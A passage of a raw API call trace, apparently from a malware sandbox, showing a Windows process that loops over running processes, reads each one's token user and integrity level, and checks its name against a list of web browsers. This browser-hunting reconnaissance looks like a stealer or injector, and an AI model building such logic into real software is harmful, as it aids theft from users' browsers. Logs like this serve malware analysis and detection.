bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0484.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0484.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0484.485] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0484.485] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0484.486] GetLastError () returned 0x7a [0484.486] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0484.486] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0484.486] CloseHandle (hObject=0x3bc) returned 1 [0484.486] CloseHandle (hObject=0x5a4) returned 1 [0484.486] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0484.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0484.486] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377ea8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x7f") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0484.487] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0484.487] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0484.487] GetLastError () returned 0x7a [0484.487] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0484.487] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0484.487] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0484.487] CloseHandle (hObject=0x3bc) returned 1 [0484.487] CloseHandle (hObject=0x5a4) returned 1 [0484.488] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0484.488] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0484.488] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0484.488] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0484.488] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0484.488] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0484.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0484.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0484.488] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0484.488] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0484.488] GetLastError () returned 0x7a [0484.489] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0484.489] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0484.489] CloseHandle (hObject=0x3bc) returned 1 [0484.489] CloseHandle (hObject=0x5a4) returned 1 [0484.489] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0484.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0484.489] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375b60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x80") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0484.489] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0484.489] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0484.490] GetLastError () returned 0x7a [0484.490] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0484.490] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0484.490] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0484.490] CloseHandle (hObject=0x3bc) returned 1 [0484.490] CloseHandle (hObject=0x5a4) returned 1 [0484.490] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0484.490] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0484.490] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0484.490] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0484.491] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0484.491] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0484.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0484.491] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0484.491] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0484.491] GetLastError () returned 0x7a [0484.491] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0484.491] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0484.491] CloseHandle (hObject=0x3bc) returned 1 [0484.491] CloseHandle (hObject=0x5a4) returned 1 [0484.492] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0484.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0484.492] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376320, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x81") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0484.492] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0484.492] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0484.492] GetLastError () returned 0x7a [0484.492] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0484.492] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0484.492] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0484.493] CloseHandle (hObject=0x3bc) returned 1 [0484.493] CloseHandle (hObject=0x5a4) returned 1 [0484.493] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0484.493] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0484.493] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0484.493] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0484.493] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0484.493] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0484.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0484.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0484.493] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0484.494] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0484.494] GetLastError () returned 0x7a [0484.494] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0484.494] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0484.494] CloseHandle (hObject=0x3bc) returned 1 [0484.494] CloseHandle (hObject=0x5a4) returned 1 [0484.494] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0484.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0484.495] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376968, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x82") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0484.495] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0484.495] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0484.495] GetLastError () returned 0x7a [0484.495] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0484.495] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0484.495] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0484.495] CloseHandle (hObject=0x3bc) returned 1 [0484.495] CloseHandle (hObject=0x5a4) returned 1 [0484.496] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0484.496] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0484.496] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0484.496] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0484.496] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0484.496] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0484.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0484.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0484.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0484.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0484.497] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0484.497] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0484.497] GetLastError () returned 0x7a [0484.497] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0484.497] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0484.497] CloseHandle (hObject=0x3bc) returned 1 [0484.497] CloseHandle (hObject=0x5a4) returned 1 [0484.497] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0484.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0484.498] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376d10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x83") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0484.498] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0484.498] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0484.498] GetLastError () returned 0x7a [0484.498] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0484.498] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0484.498] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0484.498] CloseHandle (hObject=0x3bc) returned 1 [0484.498] CloseHandle (hObject=0x5a4) returned 1 [0484.499] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0484.499] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0484.499] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0484.499] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0484.499] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0484.499] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0484.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0484.499] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0484.500] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0486.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa388) returned 0xc0000004 [0486.509] VirtualAlloc (lpAddress=0x0, dwSize=0xb388, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0486.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb388, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0486.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0486.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0486.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0486.510] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0486.510] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0486.510] GetLastError () returned 0x7a [0486.510] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0486.510] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0486.510] CloseHandle (hObject=0x3bc) returned 1 [0486.510] CloseHandle (hObject=0x5a4) returned 1 [0486.510] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0486.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0486.510] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377e68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">\x84") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0486.510] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0486.510] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0486.510] GetLastError () returned 0x7a [0486.510] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0486.510] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0486.511] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0486.511] CloseHandle (hObject=0x3bc) returned 1 [0486.511] CloseHandle (hObject=0x5a4) returned 1 [0486.511] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0486.511] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0486.511] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0486.511] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0486.511] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0486.511] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0486.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0486.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0486.511] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0486.511] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | 